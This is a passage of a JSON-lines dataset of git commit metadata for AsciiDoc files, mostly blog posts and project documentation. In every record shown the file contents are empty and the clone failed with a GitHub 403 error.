'_posts\/2017-03-03-Test-Collab.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-03-03-Test-Collab.adoc","new_file":"_posts\/2017-03-03-Test-Collab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4616bb570d40d3a924112c14985867f3a543912d","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a86e73f383a974a8d887ca1d7d2729c62dfeb4b","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76406ef1f078a8ca0c70f0f02e3a80c183991127","subject":"y2b create post iPhone 5s Unboxing (GOLD iPhone 5s Launch Day Unboxing)","message":"y2b create post iPhone 5s Unboxing (GOLD iPhone 5s Launch Day Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5s-Unboxing-GOLD-iPhone-5s-Launch-Day-Unboxing.adoc","new_file":"_posts\/2013-09-20-iPhone-5s-Unboxing-GOLD-iPhone-5s-Launch-Day-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e9c03aa83592e613270cfc5795f73c8b23ebfb8","subject":"Add AbstractAuthenticationProcessingFilter Docs","message":"Add AbstractAuthenticationProcessingFilter Docs\n\nCloses gh-8004\n","repos":"fhanik\/spring-security,fhanik\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,djechelon\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/abstract-authentication-processing-filter.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/abstract-authentication-processing-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80a591294ea622bd83855c98bfc347313146cb2d","subject":"Update 2015-11-06-Test.adoc","message":"Update 2015-11-06-Test.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-06-Test.adoc","new_file":"_posts\/2015-11-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"183d732d55300951b62f2d24b757f2f7b42a17b9","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfeeb1ab4745f5d38c4707649c5125ce52518907","subject":"Update 2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","message":"Update 2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","new_file":"_posts\/2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5737e7c8ff8f10766807ac46b0d00b47f4fdb36","subject":"Update 2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b089487c208c9e9708a29e1eb8bf275247eaa4c","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78345d6b4753d03856efff2603f35d39354804fa","subject":"Update 2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","message":"Update 2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","new_file":"_posts\/2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664ffa95d212315de15fd9c673ecef1793bf6503","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"844730bc454ede607312df53a2a6b3cdb5d80978","subject":"Update 2017-08-26-Kotlin.adoc","message":"Update 2017-08-26-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-26-Kotlin.adoc","new_file":"_posts\/2017-08-26-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b39e80e728193f49b7860030325553600f8a8df","subject":"Corr link","message":"Corr link\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"160f93a8d3dc9a88d1606687e02ec8cbf41b1c34","subject":"y2b create post 3 Cool Tech Deals - #1","message":"y2b create post 3 Cool Tech Deals - #1","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-29-3-Cool-Tech-Deals--1.adoc","new_file":"_posts\/2015-05-29-3-Cool-Tech-Deals--1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4e81107d227958f1419a78e4fef3af023430047","subject":"fix: \u30ea\u30f3\u30af\u306e\u6539\u884c\u304c\u6d88\u3048\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63","message":"fix: \u30ea\u30f3\u30af\u306e\u6539\u884c\u304c\u6d88\u3048\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a5e113059311b8f8417694bed96642c245df67","subject":"Update 2015-07-07-Hello-World.adoc","message":"Update 2015-07-07-Hello-World.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-07-Hello-World.adoc","new_file":"_posts\/2015-07-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c39720e7c94e5b6fd2caa8baaef3a7be82281ae0","subject":"Update 2016-09-18-Math-Week-2.adoc","message":"Update 2016-09-18-Math-Week-2.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Math-Week-2.adoc","new_file":"_posts\/2016-09-18-Math-Week-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5968f8a0b7a6e2bdec1bf7a835ddae4a43e823e","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42e9d6d450a8aea50f4cad4235959cf88d090128","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49ee7ae8ffec42e96f1da7cd232f82c96b6ca209","subject":"Add list of 3rd party libraries","message":"Add list of 3rd party libraries\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/7-3rdparty-libraries.adoc","new_file":"docs\/src\/7-3rdparty-libraries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"088af152da3164140b431c924ad5d35553b18407","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47858a36c79462cc2ef8e181edb6ab00520b1592","subject":"Update 2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","message":"Update 2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","new_file":"_posts\/2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dffa2f6842c778d269bbdfe96c28fa0d8b72ce50","subject":"Added empty adoc file","message":"Added empty adoc file\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e811163d316537d14d54b8ed27a613c8f737dcef","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57b16b4ab355493c61578c0e11237416d566dfbf","subject":"Partial draft for Java Update-by-Query","message":"Partial draft for Java Update-by-Query\n","repos":"palecur\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch","old_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/palecur\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3bfaf0945e1d787563581dc9790b5ae2e4efc531","subject":"Update 2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","message":"Update 2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","new_file":"_posts\/2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a3d8432c2a46e32093c641418f71ccc7b0d60c2","subject":"Add IN\/Clojure 2020 event info (Feb 14-15, Pune, IN)","message":"Add IN\/Clojure 2020 event info (Feb 14-15, Pune, IN)\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/inclojure.adoc","new_file":"content\/events\/2020\/inclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ae71e38093d8ab22b1a677465e05bedafbcaab32","subject":"Current stable version is 2.0.0","message":"Current stable version is 2.0.0\n\n[ci skip]\n","repos":"bharavi\/jPOS,jpos\/jPOS,yinheli\/jPOS,imam-san\/jPOS-1,atancasis\/jPOS,c0deh4xor\/jPOS,sebastianpacheco\/jPOS,poynt\/jPOS,imam-san\/jPOS-1,jpos\/jPOS,barspi\/jPOS,jpos\/jPOS,bharavi\/jPOS,poynt\/jPOS,alcarraz\/jPOS,yinheli\/jPOS,yinheli\/jPOS,alcarraz\/jPOS,barspi\/jPOS,atancasis\/jPOS,alcarraz\/jPOS,sebastianpacheco\/jPOS,juanibdn\/jPOS,atancasis\/jPOS,poynt\/jPOS,barspi\/jPOS,bharavi\/jPOS,c0deh4xor\/jPOS,juanibdn\/jPOS,sebastianpacheco\/jPOS,c0deh4xor\/jPOS,imam-san\/jPOS-1,juanibdn\/jPOS","old_file":"doc\/src\/asciidoc\/master.adoc","new_file":"doc\/src\/asciidoc\/master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpos\/jPOS.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"067b6efbdb96440191a6071872b0adaddcf633c6","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecadc8512dd031406c71dde4705d76dc244ded35","subject":"Link tuto","message":"Link tuto\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c645038da1b98c419cb4fe72e54d47e474ec6ad","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b3df05099c89365a7a6b4a90080f2ddf8986cdd","subject":"Update 2016-05-23-T-E-S-T-N-G.adoc","message":"Update 2016-05-23-T-E-S-T-N-G.adoc","repos":"mufarooqq\/blog,mufarooqq\/blog,mufarooqq\/blog,mufarooqq\/blog","old_file":"_posts\/2016-05-23-T-E-S-T-N-G.adoc","new_file":"_posts\/2016-05-23-T-E-S-T-N-G.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mufarooqq\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaaf69f0e50e8f9667c5f8b2d4a958a3e5b961cb","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1de772c29032054ce5e29596b6921ccc32ce67f","subject":"Update 2017-05-22-Hello-World.adoc","message":"Update 2017-05-22-Hello-World.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-05-22-Hello-World.adoc","new_file":"_posts\/2017-05-22-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aff31a4f554bc843904c7c262f376522c5eb7870","subject":"Create Asciidoctor.adoc","message":"Create Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"423715d44c34e0eaf4d2273a9387892d45ae1671","subject":"Adds links to Logstash plugins under the Integrations page.","message":"Adds links to Logstash plugins under the Integrations page.\n","repos":"fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/plugins\/integrations.asciidoc","new_file":"docs\/plugins\/integrations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fubuki\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0764d43557c4adbe79a5bbcce73adc59a79728d1","subject":"Adding 0.8.0.CR1 release announcement","message":"Adding 0.8.0.CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-07-04-debezium-0-8-0-cr1-released.adoc","new_file":"blog\/2018-07-04-debezium-0-8-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47e79e134389ec5ab21c1b81c39c967aac4ca0cc","subject":"Implementation note for combined referential fix","message":"Implementation note for combined referential fix\n","repos":"keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11556_combined_attribute\/11556_combined_attribute_int.adoc","new_file":"doc-bridgepoint\/notes\/11556_combined_attribute\/11556_combined_attribute_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2224ecfb1a9eb3085f68ab48865d14fc03d9a34e","subject":"Create README.adoc","message":"Create README.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.24\/ubuntu\/README.adoc","new_file":"1.0.0-beta.24\/ubuntu\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98376b9947a772aefbc788fdcade5924c05f84cd","subject":"Update 2017-07-10.adoc","message":"Update 2017-07-10.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-07-10.adoc","new_file":"_posts\/2017-07-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3709c783dd9e23190338289ecdb560b8eff7d0f","subject":"Update 2016-08-01-Bookreview-A-short-History-of-Time.adoc","message":"Update 2016-08-01-Bookreview-A-short-History-of-Time.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-08-01-Bookreview-A-short-History-of-Time.adoc","new_file":"_posts\/2016-08-01-Bookreview-A-short-History-of-Time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89aedb448081e1c3b70f8c1f94771576216a9d1f","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28ef3a98daff0f8fed9f5a1f3471573e8968f293","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned 